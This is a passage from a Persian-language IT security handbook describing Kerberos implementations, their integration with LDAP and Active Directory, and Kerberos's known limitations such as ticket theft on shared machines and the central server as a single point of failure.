‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻨﻲ ‪ Kerberos‬ﻳﺎ ﻣﺸﺎﺑﻪ ﺁﻥ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﻃﺮﻳﻖ ﭼﻨﺪﻳﻦ ﺷـﺮﻛﺖ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﻧﺪ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﻳـﻚ ﻗـﺴﻤﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻣﺜﻞ ‪ ،Mac OS X ،Solaris‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ‪ Linux‬ﻭ ‪ BSD‬ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺍﺯ ‪ Windows 2000‬ﺑﻪ‬
‫ﺑﻌﺪ ﺩﺭ ‪ Microsoft Windows‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ‪ Kerberos 5‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﻴـﺎﻥ‬
‫‪١٧٨‬‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ‪ Unix‬ﻭ ﺑﺴﺘﺮﻫﺎﻱ ‪ Windows‬ﺑﺘﻮﺍﻥ ﺍﺯ ‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﺎﻳﺪ ‪ Kerberos‬ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ‪ Kerberos‬ﻣﺮﺑﻮﻁ ﺑﻪ ‪ MIT‬ﺑـﺮﺍﻱ ﺷـﻬﺮﻭﻧﺪﺍﻥ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ ﻛﺎﻧـﺎﺩﺍ ﺩﺭ‬
‫ﺁﺩﺭﺱ ‪ http://web.mit.edu/kerberos/www/‬ﻭ ﺑـــﺮﺍﻱ ﺩﻳﮕـــﺮﺍﻥ ﺩﺭ ﺁﺩﺭﺱ ‪ http://www.crypto-publish.org‬ﻗﺎﺑـــﻞ‬

‫‪ ۱۷۷‬ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﮑﺮﺑﻨﺪﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﻣﻌﺘﺒﺮ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﻛﻠﻴﺪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ‪.‬‬
‫‪ ۱۷۸‬ﺩﺭ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﻪ ﭘﺮﻭﺗﻜﻞ ‪ kerberos‬ﺩﺍﺩﻩ ﻛﻪ ﺍﺛﺮ ﺁﻥ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ ‪ Windows‬ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫‪ kerberos‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Windows‬ﺍﺳﺖ‪ .‬ﻟﺬﺍ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺨﻠﻮﻁ ‪ Windows‬ﻭ ﻳﻮﻧﻴﻜﺲ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ kerberos‬ﻣﺎﺷـﻴﻨﻬﺎﻱ‬
‫‪ Windows 2000‬ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ Windows‬ﻭ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ Unix‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫‪٣٤١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﺗﻘﺎﻫﺎﻱ ﺭﺳﻤﻲ‪ ،‬ﺍﺻﻼﺣﻬﺎ‪ ،‬ﻭ ﺍﻃﻼﻋﻴـﻪﻫـﺎﻱ ﺍﻋـﻼﻡ ﻧﻘـﺎﻳﺺ ﺭﺍ ﻧﻴـﺰ ﺑﻴﺎﺑﻴـﺪ‪ .‬ﺩﺭ ‪Kerberos‬‬
‫ﭼﻨﺪﻳﻦ ﺍﺷﻜﺎﻝ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺷﺖ؛ ﻟﺬﺍ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ Kerberos‬ﺑﻪ ﻧﺎﻡ "‪ "Heimdal‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﺑـﺎ ‪ Kerberos‬ﻣﺮﺑـﻮﻁ ﺑـﻪ ‪MIT‬‬
‫ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺳﺎﺯﮔﺎﺭ ﺍﺳﺖ‪ .‬ﻣﻲﺗﻮﺍﻧﻴـﺪ ‪ Heimdal‬ﺭﺍ ﺍﺯ ﺁﺩﺭﺱ ‪ http://www.pdc.kth.se/heimdal/‬ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ‪ .‬ﺗﻐﻴﻴـﺮﺍﺕ ﻻﺯﻡ ﺩﺭ‬
‫ﭘﻴﮑﺮﺑﻨﺪﻱ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭﻱ ‪ Kerberos‬ﺑﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﺍﮔﺮ ﺧﻮﺩﺗﺎﻥ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻋﻤـﺎﻝ ﻛﻨﻴـﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺧﻮﺩ ‪ Kerberos‬ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪ Kerberos‬ﻭ ‪LDAP‬‬

‫‪ Kerberos‬ﺑﺎ ‪) LDAP‬ﻛﻪ ﺩﺭ ﻗﺴﻤﺖ ﺑﻌﺪﻱ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ( ﺑﺨﻮﺑﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﺮﻛﻴﺐ ﻣﻲﺷﻮﻧﺪ‪ Kerberos .‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ‪query‬ﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎﻱ ‪ LDAP‬ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﻣﻘﺎﺑﻞ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ‪ LDAP‬ﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻛـﻪ‬
‫ﭼﮕﺎﻟﺘﺮ ﺍﺯ ﺩﺍﺩﺓ ﺣﻔﺎﻇﺖﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﻨﻬﺎ ‪ Kerberos‬ﺍﺳﺖ ‪ -‬ﻣﺜﻞ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺧﺎﻧﻪ ﻛﺎﺭﺑﺮ‪ ،‬ﭘﻮﺳﺘﻪ‪ ،‬ﺷـﻤﺎﺭﻩ ﺗﻠﻔـﻦ‪ ،‬ﻳـﺎ ﺩﻳﮕـﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ‪ -‬ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ‪ .‬ﺩﺭ ﻣﺠﻤﻮﻉ‪ ،‬ﺍﻳﻦ ﺩﻭ ﺳﺮﻭﻳﺲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﻤﺔ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ‪ NIS‬ﻭ ‪ NIS+‬ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻫـﻢ‬
‫‪١٧٩‬‬
‫ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ‪ LDAP‬ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ ‪ Kerberos‬ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ‪ Windows‬ﺍﺯ ‪ Kerberos‬ﺍﺯ ﺧـﺪﻣﺎﺕ‬
‫‪) Microsoft Active Directory‬ﻳﻚ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺯ ‪ (LDAP‬ﺑـﺮﺍﻱ ﺫﺧﻴـﺮﺓ ﻛﻠﻴـﺪﻫﺎﻱ ‪ Kerberos‬ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ‪Heimdal .‬‬
‫‪ Kerberos‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﭘﺸﺘﻴﺎﺑﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ‪ MIT Kerberos‬ﻧﻪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺟﺎﻱ ﻧﮕﺮﺍﻧﻲ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺩﺭ ‪ MIT Kerberos‬ﺍﻳﻦ‬
‫ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺧﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Kerberos‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬

‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ‪Kerberos‬‬

‫ﺍﮔﺮﭼﻪ ‪ Kerberos‬ﻳﻚ ﺭﺍﻩ ﺣﻞ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻨﻮﺯ ﻫﻢ ﻧﻘﺎﻳﺺ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﮐـﻪ ﺩﺭ ﺫﻳـﻼ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺷـﺎﺭﻩ‬
‫ﻣﻲﺷﻮﺩ‪:‬‬

‫ﻫﺮ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ‪ Kerberos‬ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ‬
‫ﺑﻌﻠﺖ ﻃﺮﺍﺣﻲ ‪ ،Kerberos‬ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﺭﻭﻧﺪ ﺍﻋﻤﺎﻝ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﻭﻱ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻳﺎ ﺑﺮﻧﺎﻣـﻪ‬‫ﻻ "‪ "Kerberizing‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻛﻪ ﺍﺯ ﻗﺒﻞ ﺑﺎ ‪ Kerberos‬ﺍﺩﻏﺎﻡ ﺷﺪﻩ )ﻣﺜﻞ ‪ PAM‬ﻛﻪ ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺧﻮﺍﻫﺪ ﺷﺪ(‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪ Kerberos‬ﺩﺭ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻛﺎﺭ ﻧﻤﻲﻛﻨﺪ‬


‫‪ Kerberos‬ﺑﺮﺍﻱ ﻣﺤﻴﻄﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻫﺮ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺁﻥ ﻳﻚ ﻛﺎﺭﺑﺮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﭼﻨـﺪ ﻧﻔـﺮ‬
‫ﺩﻳﮕﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻠﻴﻂ ﻛﺎﺭﺑﺮ ﺗﻮﺳـﻂ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ ﺳـﺮﻗﺖ ﺑـﺮﻭﺩ‪ .‬ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﺑﻠﻴﻄﻬـﺎﻱ‬
‫ﺩﺯﺩﻳﺪﻩﺷﺪﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻓﺮﻳﺒﻨﺪﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬

‫‪ Kerberos‬ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ‪ Kerberos‬ﻧﻴﺎﺯ ﺩﺍﺭﺩ‬


‫ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻃﺮﺍﺣﻲ‪ Kerberos ،‬ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻣﺮﻛﺰﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺍﺻـﻠﻲ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻭ ﺑﻄـﻮﺭ‬
‫ﻣﺪﺍﻭﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﻗﻴﻘـﹰﺎ ﺑﺎﻳـﺪ ﺍﺯ ﻫـﻴﭻ ﭼﻴـﺰﻱ ﻏﻴـﺮ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪Kerberos‬‬

‫‪ ۱۷۹‬ﺟﻴﺴﻦ ﻫﻴﺲ )‪ (Jason Heiss‬ﺭﺍﻫﻨﻤﺎﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺭ ﺻﻔﺤﻪﺍﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺑﻨـﺎﻡ "ﺟـﺎﻳﮕﺰﻳﻨﻲ ‪ NIS‬ﺑـﺎ ‪ Kerberos‬ﻭ ‪ "LADP‬ﺩﺭ ﺁﺩﺭﺱ‬
‫‪ http://www.ofb.net/~jheiss/krbldap‬ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٤٢‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺗﺤﺖ ﻗﻔﻞ ﻭ ﻛﻠﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﺍﺳﺖ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺧﺮﺍﺏ ﺷﻮﺩ‪ ،‬ﺗﻤﺎﻡ ﺷﺒﻜﺔ ‪ Kerberos‬ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ -‬ﻛﻪ ﺭﻭﻱ ﻫﻤـﺎﻥ ﺩﻳـﺴﻚ‬
‫ﺳﺨﺘﻲ ﻭﺍﻗﻊ ﺷﺪﻩ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺩﺭ ﺁﻥ ﻫﺴﺘﻨﺪ ‪ -‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪ Kerberos‬ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ‪.‬‬

‫‪ Kerberos‬ﺗﻐﻴﻴﺮﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ )ﺍﺳﺒﻬﺎﻱ ﺗﺮﻭﺍ( ﺭﺍ ﻧﺎﺩﻳﺪﻩ ﻣﻲﮔﻴﺮﺩ‬


‫‪ Kerberos‬ﺑﺎﻋﺚ ﻧﻤﻲﺷﻮﺩ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﺤﻠﻲ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ ‪ -‬ﻳﻌﻨﻲ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﻱ ﻛـﻪ ﭘـﺸﺖ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻧﺸﺴﺘﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻔﻬﻤﺪ ﺭﺍﻳﺎﻧﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪ .‬ﺍﻳﻦ ﻛﻤﺒﻮﺩ ﺑﺮﺍﺣﺘﻲ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺁﮔﺎﻩ ﺑﻪ ﺍﻳﻦ‬
‫ﻣﺴﺌﻠﻪ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﭘﻴﺎﻣﺪﻫﺎﻱ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻫﺴﺘﻨﺪ ﻛﻪ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ‪ ،‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ‬
‫ﻛﺎﺭﻱ ﺩﺍﺭﺍﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ ﻫﺴﺘﻨﺪ‪.‬‬

‫‪ Kerberos‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻋﺘﻤﺎﺩ ﮔﺴﺘﺮﺵﻳﺎﺑﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‬


‫ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻳﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﺩ‪ ،‬ﺑﺮﺍﻱ ﻳﻚ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺍﺯ ﺁﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻜﺎﺭ ﺑﻨﺪﺩ‪.‬‬

‫‪ Kerberos‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﺁﻥ ﺑﻪ ﻭﻓﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﻭ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘـﺮ ﺍﻳﻨﻜـﻪ ﻣﺒـﺎﻧﻲ ﭘﺎﻳـﺔ ﺁﻥ‬
‫ﺑﺼﻮﺭﺕ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺴﺘﻘﻴﻢ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻴﺰ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬

‫‪LDAP‬‬
‫ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ" )‪ ،(LDAP‬ﻳﻚ ﻧﺴﺨﺔ ﻛﻢ ﺩﺭﺩﺳﺮ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘـﻮﺭﻱ ‪ X.500‬ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ )ﻣﺜﻞ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ‪ ،‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﻧـﺎﻝ ﺍﻣـﻦ‬
